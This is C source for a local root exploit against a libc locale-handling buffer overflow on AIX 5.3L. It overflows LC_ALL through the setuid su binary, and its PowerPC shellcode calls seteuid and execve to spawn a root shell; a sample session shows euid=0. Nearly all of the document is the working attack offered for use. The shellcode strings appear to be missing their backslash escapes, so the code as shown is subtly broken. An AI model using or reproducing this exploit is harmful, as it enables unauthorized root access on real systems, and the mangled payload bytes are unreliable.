* ========================&# /*AIX 5.3L libc locale environment handling local root exploit
* ============================================================
* The AIX5.3L (and possibly others) libc is vulnerable to multiple
* buffer overflow issues in the handling of locale environment
* variables. This allows for exploitation of any setuid root binary
* that makes use of functions such as setlocale() which do not
* perform bounds checking when handling LC_* environment variables.
* An attacker can leverage this issue to obtain root privileges on
* an impacted AIX system. This exploit makes use of the "/usr/bin/su"
* binary to trigger the overflow through LC_ALL and obtain root.
*
* e.g
* bash-4.4$ oslevel;uname -a;ls -al `which su`
* 5.3.0.0
* AIX aix53l 3 5 000772244C00
* -r-sr-xr-x 1 root security 28598 May 06 2006 /usr/bin/su
* bash-4.4$ gcc aix53l-libc.c -o aix53l-libc
* bash-4.4$ ./aix53l-libc
* [ AIX5.3L libc locale environment handling local root exploit
* # id
* uid=202(user) gid=1(staff) euid=0(root)
*
* -- Hacker Fantastic
* (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>
#include <string.h>
char shellcode[]="x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7fxffxfbx78" /* mr r31,r31 (nop) */
"x7cx84x22x78" /* xor r4,r4,r4 */
"x7ex94xa2x79" /* xor. r20,r20,r20 */
"x40x82xffxfd" /* bnel (seteuidcode) */
"x7exa8x02xa6" /* mflr r21 */
"x3axb5x01x40" /* cal r21,0x140(r21) */
"x88x55xfexe0" /* lbz r2,-288(r21) */
"x7ex83xa3x78" /* mr r3,r20 */
"x3axd5xfexe4" /* cal r22,-284(r21) */
"x7exc8x03xa6" /* mtlr r22 */
"x4cxc6x33x42" /* crorc cr6,cr6,cr6 */
"x44xffxffx02" /* svca */
"xaax06xffxff" /* 0xab = seteuid 0x06 = execve */
"x38x75xffx04" /* cal r3,-252(r21) */
"x38x95xffx0c" /* cal r4,-244(r21) */
"x7ex85xa3x78" /* mr r5,r20 */
"x90x75xffx0c" /* st r3,-244(r21) */
"x92x95xffx10" /* st r20,-240(r21) */
"x88x55xfexe1" /* lbz r2,-287(r21) */
"x9ax95xffx0b" /* stb r20,-245(r21) */
"x4bxffxffxd8" /* bl (setreuidcode+32) */
"/bin/sh";
int main(int argc, char* argv[]){
int i = 0;
int bufsize = 2048;
char* buffer = malloc(bufsize);
if(!buffer)
exit(0);
char* envp[] = {buffer,NULL};
char* argvp[] = {"su","/",NULL};
printf("[ AIX5.3L libc locale environment handling local root exploit ");
memset(buffer,0,1024);
strcpy(buffer,"LC_ALL=");
for(i = 0;i < 334;i++){
strcat(buffer,"A");
}
strcat(buffer,"x2fxf2x2fx04"); // 0x2ff22f04
strcat(buffer,"AA");
strcat(buffer,shellcode);
execve("/usr/bin/su",argvp,envp);
}